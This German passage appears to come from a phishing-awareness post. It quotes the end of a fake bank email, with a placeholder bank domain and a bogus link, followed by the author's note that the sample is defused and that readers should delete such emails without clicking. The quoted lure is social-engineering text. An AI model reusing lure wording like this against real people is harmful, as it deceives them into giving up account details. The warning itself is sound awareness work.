bestätigen.http://<IrgendeineBANK>.de/kundendienst/anfang.cgi?id=780382890142464722280878838112 069450803120433874879964Wir bitten Sie, eventuelle Unannehmlichkeiten zu entschuldigen, und danken Ihnen für Ihre Mithilfe.=================================================© <IrgendeineBANK>.de 2007. Alle Rechte vorbehalten. (Keine Sorge, diese E-Mail ist entschärft und der Link führt nirgendwo hin ;-) Also: Ein wachsames Auge auf E-Mails haben und keinesfalls anklicken. Sofort löschen!